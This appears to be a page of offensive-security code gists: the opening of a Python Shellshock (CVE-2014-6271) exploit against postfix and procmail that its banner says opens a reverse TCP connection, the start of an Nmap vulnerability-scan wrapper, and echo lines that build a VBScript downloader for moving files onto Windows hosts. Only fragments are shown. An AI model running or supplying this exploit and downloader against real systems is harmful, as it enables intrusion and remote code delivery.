View Shellshock_SMTP_Exploit.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
import sys,socket,subprocess | |
bnr = ''' | |
##################################################################################### | |
# postfix + procmail + formail ShellShock Exploit # | |
# Tested on: Debian 5 (postfix smtp,procmail) # | |
# By 3mrgnc3 06/02/2017 # | |
# CVE : 2014-6271 # | |
# Initiates a Reverse TCP connection # |
View Automated_Nmap_Vuln_Scan.sh
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
echo "This script is also runable with arguments | |
sudo Nmap <host> <ports> <name_of_file_to_save_to>" | |
echo "" | |
echo "" | |
echo "" | |
if [ $# -eq 0 ] | |
then | |
echo "What host are you scanning?" | |
read Host |
View Transfer-files-Windows-vista-and-up.txt
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
echo strUrl = WScript.Arguments.Item(0) > wget.vbs | |
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs | |
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs | |
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs | |
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs | |
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs | |
echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs | |
echo Err.Clear >> wget.vbs | |
echo Set http = Nothing >> wget.vbs | |
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs |